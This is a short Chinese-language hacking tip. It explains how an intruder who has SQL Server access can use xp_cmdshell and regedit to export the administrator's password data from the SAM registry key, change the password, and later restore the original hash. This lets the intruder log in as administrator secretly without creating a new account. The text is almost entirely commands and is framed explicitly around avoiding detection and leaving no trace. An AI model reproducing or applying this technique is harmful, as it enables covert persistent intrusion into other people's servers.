拿到sql权限后,不用在系统中建立帐号登陆,比较容易被发现,可用原administrator帐号进入:
exec master.dbo.xp_cmdshell ''
HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\000001F4 中保存着administrator 的登陆密码信息。
1.导出注册表原administrator帐号的密码信息
regedit /e D:\old.reg HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\000001F4
//此命令将密码信息导出为old.reg
2.直接更改密码
net user administrotr 123 //将密码更改为123
3.导出现在administrator帐号的密码信息
regedit /e D:\new.reg HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\000001F4
4.登陆操作完成后将原密码信息导入注册表
regedit /s D:\old.reg
5.注意上述操作所有操作必需在远程系统中进行,因为每个机器不同即使用同样的密码,导出的密码信息也完全不同。此时,原密码已成功导回,管理员登陆时照样可以用原密码登陆,而渗透者需要登陆时只需把new.reg导入到注册表中,直接登录,完成操作后再把old.reg导入到注册表,不用创建新的帐号,不容易在系统中留下痕迹
